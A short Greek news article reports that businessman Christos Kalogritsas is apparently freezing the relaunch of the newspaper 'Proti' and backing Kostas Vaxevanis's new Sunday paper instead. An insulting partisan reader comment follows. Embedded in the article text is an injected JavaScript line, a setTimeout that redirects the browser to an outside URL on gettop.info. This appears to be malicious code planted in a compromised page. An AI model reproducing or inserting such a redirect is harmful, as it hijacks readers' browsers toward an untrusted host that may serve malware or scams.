«Παγώνει» την έκδοση της «Πρώτης» ο Καλογρίτσας

1
8

 

Το «πάγωμα» της επανέκδοσης της εφημερίδας «Πρώτη» φαίνεται ότι έχει αποφασίσει ο επιχειρηματίας Χρήστος Καλογρίτσας. Παρά το γεγονός ότι οι δημοσιογράφοι Χρήστος Μαχαίρας και Παναγιώτης Παναγιώτου είχαν ξεκινήσει να προετοιμάζουν το συγκεκριμένο εκδοτικό project, εσχάτως ο κ. Καλογρίτσας δείχνει να έχει αλλάξει ρότα. Αυτό, φυσικά, δεν σημαίνει ότι δεν θα ασχοληθεί με τις εκδόσεις.

Ενημερωμένες πηγές που επικαλούνται τα «Παραπολιτικά», αναφέρουν ότι ο γνωστός κατασκευαστής προτιμά στην παρούσα φάση να επενδύσει στο εκδοτικό εγχείρημα του Κώστα Βαξεβάνη, ο οποίος ετοιμάζεται να βγάλει στα περίπτερα μια νέα κυριακάτικη εφημερίδα, που αναμένεται να κυκλοφορήσει στις 27 Νοεμβρίου και, κατά πάσα πιθανότητα, πέραν της αποκαλυπτικής ύλης του, θα συνοδεύεται από το περιοδικό «Ηot Doc». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Tο παραμύθι του Τσίπρα για άλλη μία φορά αποκαλύπτεται. Ο Καλογρίτσας αυτός που προσπαθούσαν όλοι του ΣΥΡΙΖΑ να μας αποδείξουν πως δεν ήταν ο μοιραίος παίχτης τους στην απόκτηση τηλεοπτικού σταθμού τώρα συνεργάζεται με τον Βαξεβάνη ,ιδιοκτήτη του ΗΟΤ dog περιοδικό προπαγάνδας του ΣΥΡΙΖΑ, για να βγάλουν εφημερίδα. Ξεφτίλες.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here